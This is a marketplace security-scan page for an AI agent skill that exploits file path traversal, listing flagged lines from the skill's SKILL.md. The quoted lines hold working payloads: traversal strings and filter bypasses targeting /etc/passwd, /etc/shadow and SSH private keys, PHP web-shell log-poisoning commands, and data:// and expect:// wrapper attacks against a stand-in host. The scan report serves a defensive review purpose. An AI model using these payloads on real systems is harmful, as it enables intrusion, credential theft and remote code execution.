Skip to main content

file-path-traversal

Identifies and exploits file path traversal vulnerabilities in web applications, providing detailed reports and remediation guidance.

Install this skill

or
0/100

Security score

The file-path-traversal skill was audited on May 12, 2026 and we found 81 security issues across 4 threat categories, including 5 critical. Review the findings below before installing.

Categories Tested

Security Issues

medium line 322

System command execution

SourceSKILL.md
322curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
medium line 328

System command execution

SourceSKILL.md
328# First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
medium line 336

System command execution

SourceSKILL.md
336curl -A "<?php system('id'); ?>" \
medium line 340

System command execution

SourceSKILL.md
340curl -A "<?php system(\$_GET['c']); ?>" \
medium line 351

System command execution

SourceSKILL.md
351curl -X POST -d "<?php system('id'); ?>" \
medium line 118

Curl to non-GitHub URL

SourceSKILL.md
118# Test payloads with curl
medium line 120

Curl to non-GitHub URL

SourceSKILL.md
120curl "http://target.com/download?file=....//....//....//etc/passwd"
medium line 322

Curl to non-GitHub URL

SourceSKILL.md
322curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
medium line 325

Curl to non-GitHub URL

SourceSKILL.md
325curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
medium line 329

Curl to non-GitHub URL

SourceSKILL.md
329curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
medium line 348

Curl to non-GitHub URL

SourceSKILL.md
348curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
medium line 355

Curl to non-GitHub URL

SourceSKILL.md
355curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
medium line 358

Curl to non-GitHub URL

SourceSKILL.md
358curl "http://target.com/page?file=expect://id"
high line 105

Access to /etc/passwd

SourceSKILL.md
105../../../etc/passwd
high line 106

Access to /etc/passwd

SourceSKILL.md
106../../../../etc/passwd
high line 107

Access to /etc/passwd

SourceSKILL.md
107../../../../../etc/passwd
high line 108

Access to /etc/passwd

SourceSKILL.md
108../../../../../../etc/passwd
high line 119

Access to /etc/passwd

SourceSKILL.md
119curl "http://target.com/image?filename=../../../etc/passwd"
high line 120

Access to /etc/passwd

SourceSKILL.md
120curl "http://target.com/download?file=....//....//....//etc/passwd"
high line 127

Access to /etc/passwd

SourceSKILL.md
127/etc/passwd
high line 144

Access to /etc/passwd

SourceSKILL.md
144....//....//....//etc/passwd
high line 145

Access to /etc/passwd

SourceSKILL.md
145....\/....\/....\/etc/passwd
high line 148

Access to /etc/passwd

SourceSKILL.md
148..././..././..././etc/passwd
high line 149

Access to /etc/passwd

SourceSKILL.md
149....//....//etc/passwd
high line 153

Access to /etc/passwd

SourceSKILL.md
153%2e%2e/%2e%2e/%2e%2e/etc/passwd
high line 161

Access to /etc/passwd

SourceSKILL.md
161../../../etc/passwd%00.jpg
high line 162

Access to /etc/passwd

SourceSKILL.md
162../../../etc/passwd%00.png
high line 165

Access to /etc/passwd

SourceSKILL.md
165../../../etc/passwd...............................
high line 168

Access to /etc/passwd

SourceSKILL.md
168../../../etc/passwd.jpg.php
high line 175

Access to /etc/passwd

SourceSKILL.md
175/var/www/images/../../../etc/passwd
high line 178

Access to /etc/passwd

SourceSKILL.md
178images/../../../etc/passwd
high line 207

Access to /etc/passwd

SourceSKILL.md
207/etc/passwd # User accounts
high line 305

Access to /etc/passwd

SourceSKILL.md
305# Traverse to /etc/passwd
high line 370

Access to /etc/passwd

SourceSKILL.md
370../../../etc/passwd
high line 377

Access to /etc/passwd

SourceSKILL.md
377....//....//....//etc/passwd
high line 378

Access to /etc/passwd

SourceSKILL.md
378..;/..;/..;/etc/passwd
high line 381

Access to /etc/passwd

SourceSKILL.md
381/etc/passwd
high line 384

Access to /etc/passwd

SourceSKILL.md
384../../../etc/passwd%00.jpg
critical line 440

Access to /etc/passwd

SourceSKILL.md
440| `../../../etc/passwd` | Linux password file |
critical line 442

Access to /etc/passwd

SourceSKILL.md
442| `....//....//....//etc/passwd` | Bypass simple filter |
critical line 443

Access to /etc/passwd

SourceSKILL.md
443| `/etc/passwd` | Absolute path |
critical line 450

Access to /etc/passwd

SourceSKILL.md
450| Linux | `/etc/passwd` | User accounts |
high line 128

Access to /etc/shadow

SourceSKILL.md
128/etc/shadow
high line 208

Access to /etc/shadow

SourceSKILL.md
208/etc/shadow # Password hashes (root only)
critical line 451

Access to /etc/shadow

SourceSKILL.md
451| Linux | `/etc/shadow` | Password hashes |
medium line 105

Path traversal to sensitive directory

SourceSKILL.md
105../../../etc/passwd
medium line 106

Path traversal to sensitive directory

SourceSKILL.md
106../../../../etc/passwd
medium line 107

Path traversal to sensitive directory

SourceSKILL.md
107../../../../../etc/passwd
medium line 108

Path traversal to sensitive directory

SourceSKILL.md
108../../../../../../etc/passwd
medium line 119

Path traversal to sensitive directory

SourceSKILL.md
119curl "http://target.com/image?filename=../../../etc/passwd"
medium line 161

Path traversal to sensitive directory

SourceSKILL.md
161../../../etc/passwd%00.jpg
medium line 162

Path traversal to sensitive directory

SourceSKILL.md
162../../../etc/passwd%00.png
medium line 165

Path traversal to sensitive directory

SourceSKILL.md
165../../../etc/passwd...............................
medium line 168

Path traversal to sensitive directory

SourceSKILL.md
168../../../etc/passwd.jpg.php
medium line 175

Path traversal to sensitive directory

SourceSKILL.md
175/var/www/images/../../../etc/passwd
medium line 178

Path traversal to sensitive directory

SourceSKILL.md
178images/../../../etc/passwd
medium line 325

Path traversal to sensitive directory

SourceSKILL.md
325curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
medium line 329

Path traversal to sensitive directory

SourceSKILL.md
329curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
medium line 370

Path traversal to sensitive directory

SourceSKILL.md
370../../../etc/passwd
medium line 384

Path traversal to sensitive directory

SourceSKILL.md
384../../../etc/passwd%00.jpg
high line 440

Path traversal to sensitive directory

SourceSKILL.md
440| `../../../etc/passwd` | Linux password file |
medium line 215

Access to root home directory

SourceSKILL.md
215/root/.ssh/id_rsa # Root private key
medium line 216

Access to root home directory

SourceSKILL.md
216/root/.ssh/authorized_keys # Authorized keys
high line 215

Access to SSH directory

SourceSKILL.md
215/root/.ssh/id_rsa # Root private key
high line 216

Access to SSH directory

SourceSKILL.md
216/root/.ssh/authorized_keys # Authorized keys
high line 217

Access to SSH directory

SourceSKILL.md
217/home/<user>/.ssh/id_rsa # User private keys
low line 119

External URL reference

SourceSKILL.md
119curl "http://target.com/image?filename=../../../etc/passwd"
low line 120

External URL reference

SourceSKILL.md
120curl "http://target.com/download?file=....//....//....//etc/passwd"
low line 292

External URL reference

SourceSKILL.md
292ffuf -u "http://target.com/image?filename=FUZZ" \
low line 297

External URL reference

SourceSKILL.md
297ffuf -u "http://target.com/page?file=FUZZ" \
low line 308

External URL reference

SourceSKILL.md
308"http://target.com/index.php?file=FUZZ"
low line 313

External URL reference

SourceSKILL.md
313"http://target.com/load?path=FUZZ"
low line 322

External URL reference

SourceSKILL.md
322curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
low line 325

External URL reference

SourceSKILL.md
325curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
low line 329

External URL reference

SourceSKILL.md
329curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
low line 337

External URL reference

SourceSKILL.md
337"http://target.com/page?file=/proc/self/environ"
low line 341

External URL reference

SourceSKILL.md
341"http://target.com/page?file=/proc/self/environ&c=whoami"
low line 348

External URL reference

SourceSKILL.md
348curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
low line 352

External URL reference

SourceSKILL.md
352"http://target.com/page?file=php://input"
low line 355

External URL reference

SourceSKILL.md
355curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
low line 358

External URL reference

SourceSKILL.md
358curl "http://target.com/page?file=expect://id"
Scanned on May 12, 2026
View Security Dashboard
Installation guide →
GitHub Stars 21.5K
Rate this skill
Categorydevelopment
UpdatedMay 26, 2026
frontenddocxapidatabasetestingbackendsecurity-engineerqa-engineerbackend-developerdevelopment
sickn33/antigravity-awesome-skills